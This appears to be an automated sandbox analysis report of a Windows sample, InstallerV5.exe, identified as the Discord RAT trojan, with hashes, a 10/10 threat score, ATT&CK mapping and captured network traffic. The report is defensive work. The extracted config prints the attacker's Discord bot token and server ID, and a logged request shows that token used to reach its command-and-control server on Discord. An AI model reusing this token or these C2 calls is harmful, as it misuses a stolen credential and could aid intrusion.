discordrat | 574c5d147be871088a39dcf2dc54bf123f74da56ed2a44613e8e643e2d247ac0

Analysis

max time kernel
94s
max time network
130s
platform
windows10-2004_x64
resource
win10v2004-20240709-en
resource tags

arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
submitted
12/07/2024, 15:32 UTC

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

InstallerV5.exe
Size

78KB
MD5

b61d469cf77f2dd30e1ef31acba14fc3
SHA1

e1931cb1d20128df56ddfff69f84c5c1ed2975a7
SHA256

574c5d147be871088a39dcf2dc54bf123f74da56ed2a44613e8e643e2d247ac0
SHA512

bfee99acb08c57615d6bae9eee7bc331eecc82fee81fa09469fe7e891779cfda34860aacba77baa8c15482141169d366713ed4d6108990d4f553ac0734e256b1
SSDEEP

1536:52WjO8XeEXFh5P7v88wbjNrfxCXhRoKV6+V+K8PIC:5Zv5PDwbjNrmAE+KwIC

Score

10^/10

discordrat persistence rat rootkit stealer

Malware Config

Extracted

Family

discordrat

Attributes

discord_token
MTI1Nzc5NzM0ODg0Mzg0Nzc1MQ.Gt4uVY.fwQ0zxAA0tWa6W71KN3mXkRSbFGrwOcaXRwFhU
server_id
1257772717743276134

Signatures

Discord RAT
A RAT written in C# using Discord as a C2.
stealer rootkit rat persistence discordrat

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
4	discord.com
6	discord.com

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	3912	InstallerV5.exe

C:\Users\Admin\AppData\Local\Temp\InstallerV5.exe
"C:\Users\Admin\AppData\Local\Temp\InstallerV5.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3912

Network

DNS

gateway.discord.gg

InstallerV5.exe

Remote address:

8.8.8.8:53

Request

gateway.discord.gg

IN A

Response

gateway.discord.gg

IN A

162.159.136.234

gateway.discord.gg

IN A

162.159.133.234

gateway.discord.gg

IN A

162.159.134.234

gateway.discord.gg

IN A

162.159.135.234

gateway.discord.gg

IN A

162.159.130.234
GET

https://gateway.discord.gg/?v=9&encording=json

InstallerV5.exe

Remote address:

162.159.136.234:443

Request

GET /?v=9&encording=json HTTP/1.1
Connection: Upgrade,Keep-Alive
Upgrade: websocket
Sec-WebSocket-Key: uRyzKI1ml22OdbG7cd3c9w==
Sec-WebSocket-Version: 13
Host: gateway.discord.gg

Response

HTTP/1.1 101 Switching Protocols

Date: Fri, 12 Jul 2024 15:32:47 GMT
Connection: upgrade
sec-websocket-accept: JZ7lNvll4IIDoJ+K3jGQCEvC5Vs=
upgrade: websocket
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z9er0rwkDwhWORge0oijz4ROuaXwaXJaY89XfdstZUXwyc4zG9D6mcq1LpkRyZWRI354F2t6GrOuWu7G8I9NJV9LUulfeDTBMuVjdYd1vFoUZz%2BbwXuWoQcEptdlbJQE9brVMw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
X-Content-Type-Options: nosniff
Server: cloudflare
CF-RAY: 8a2216824b1871b6-LHR
DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

discord.com

InstallerV5.exe

Remote address:

8.8.8.8:53

Request

discord.com

IN A

Response

discord.com

IN A

162.159.135.232

discord.com

IN A

162.159.138.232

discord.com

IN A

162.159.137.232

discord.com

IN A

162.159.128.233

discord.com

IN A

162.159.136.232
POST

https://discord.com/api/v9/guilds/1257772717743276134/channels

InstallerV5.exe

Remote address:

162.159.135.232:443

Request

POST /api/v9/guilds/1257772717743276134/channels HTTP/1.1
authorization: Bot MTI1Nzc5NzM0ODg0Mzg0Nzc1MQ.Gt4uVY.fwQ0zxAA0tWa6W71KN3mXkRSbFGrwOcaXRwFhU
Content-Type: application/json; charset=utf-8
Host: discord.com
Content-Length: 29
Expect: 100-continue
Connection: Keep-Alive

Response

HTTP/1.1 403 Forbidden

Date: Fri, 12 Jul 2024 15:32:48 GMT
Content-Type: application/json
Content-Length: 49
Connection: keep-alive
set-cookie: __dcfduid=fe1715d6406311ef951c9e4f562a3599; Expires=Wed, 11-Jul-2029 15:32:48 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
strict-transport-security: max-age=31536000; includeSubDomains; preload
x-ratelimit-bucket: be56019ae011689ff5baf218062aacf5
x-ratelimit-limit: 2000
x-ratelimit-remaining: 1999
x-ratelimit-reset: 1720884768.046
x-ratelimit-reset-after: 86400.000
via: 1.1 google
alt-svc: h3=":443"; ma=86400
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hVusaJAh7GPOgJZqZyJON44Jor8YoAzfxqE0mOhzPJTtF0CS8vdbfJquHFrM0fSETEcQxoDqdKhWm4XT4Zb9DnNClZYDtb%2Bn1Ha5XgLmYp0pTPj9NoYTm4esgp0V"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
X-Content-Type-Options: nosniff
Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
Set-Cookie: __sdcfduid=fe1715d6406311ef951c9e4f562a35996dfd10070d53c1347146f0d5d5bd50bf6592cf2eefcd903ceae23bbf1ae2c725; Expires=Wed, 11-Jul-2029 15:32:48 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
Set-Cookie: __cfruid=24e5d3d92705ef92c37cee156496c5241a868b58-1720798368; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Set-Cookie: _cfuvid=MgXI1qPltG8nP0Cy6g_fxooPwwWNPSA4a7CtgqjFs1w-1720798368109-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server: cloudflare
CF-RAY: 8a2216875bcf76f9-LHR
DNS

234.136.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

234.136.159.162.in-addr.arpa

IN PTR

Response
DNS

138.32.126.40.in-addr.arpa

Remote address:

8.8.8.8:53

Request

138.32.126.40.in-addr.arpa

IN PTR

Response
DNS

232.135.159.162.in-addr.arpa

Remote address:

8.8.8.8:53

Request

232.135.159.162.in-addr.arpa

IN PTR

Response
DNS

240.221.184.93.in-addr.arpa

Remote address:

8.8.8.8:53

Request

240.221.184.93.in-addr.arpa

IN PTR

Response
DNS

26.165.165.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

26.165.165.52.in-addr.arpa

IN PTR

Response
DNS

198.187.3.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

198.187.3.20.in-addr.arpa

IN PTR

Response
DNS

107.12.20.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

107.12.20.2.in-addr.arpa

IN PTR

Response

107.12.20.2.in-addr.arpa

IN PTR

a2-20-12-107deploystaticakamaitechnologiescom
DNS

11.227.111.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

11.227.111.52.in-addr.arpa

IN PTR

Response

162.159.136.234:443

https://gateway.discord.gg/?v=9&encording=json

tls, http

InstallerV5.exe

2.0kB
19.8kB
25
30

HTTP Request

GET https://gateway.discord.gg/?v=9&encording=json

HTTP Response

101
162.159.135.232:443

https://discord.com/api/v9/guilds/1257772717743276134/channels

tls, http

InstallerV5.exe

1.1kB
5.0kB
10
11

HTTP Request

POST https://discord.com/api/v9/guilds/1257772717743276134/channels

HTTP Response

403

8.8.8.8:53

gateway.discord.gg

dns

InstallerV5.exe

64 B
144 B
1
1

DNS Request

gateway.discord.gg

DNS Response

162.159.136.234

162.159.133.234

162.159.134.234

162.159.135.234

162.159.130.234
8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

66 B
90 B
1
1

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

discord.com

dns

InstallerV5.exe

57 B
137 B
1
1

DNS Request

discord.com

DNS Response

162.159.135.232

162.159.138.232

162.159.137.232

162.159.128.233

162.159.136.232
8.8.8.8:53

234.136.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

234.136.159.162.in-addr.arpa
8.8.8.8:53

138.32.126.40.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

138.32.126.40.in-addr.arpa
8.8.8.8:53

232.135.159.162.in-addr.arpa

dns

74 B
136 B
1
1

DNS Request

232.135.159.162.in-addr.arpa
8.8.8.8:53

240.221.184.93.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

240.221.184.93.in-addr.arpa
8.8.8.8:53

26.165.165.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

26.165.165.52.in-addr.arpa
8.8.8.8:53

198.187.3.20.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

198.187.3.20.in-addr.arpa
8.8.8.8:53

107.12.20.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

107.12.20.2.in-addr.arpa
8.8.8.8:53

11.227.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

11.227.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3912-1-0x000002655CE20000-0x000002655CE38000-memory.dmp

Filesize
96KB

Download
memory/3912-0-0x00007FFF22B93000-0x00007FFF22B95000-memory.dmp

Filesize
8KB

Download
memory/3912-2-0x0000026577500000-0x00000265776C2000-memory.dmp

Filesize
1.8MB

Download
memory/3912-3-0x00007FFF22B90000-0x00007FFF23651000-memory.dmp

Filesize
10.8MB

Download
memory/3912-4-0x0000026577E40000-0x0000026578368000-memory.dmp

Filesize
5.2MB

Download
memory/3912-5-0x00007FFF22B90000-0x00007FFF23651000-memory.dmp

Filesize
10.8MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Response

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.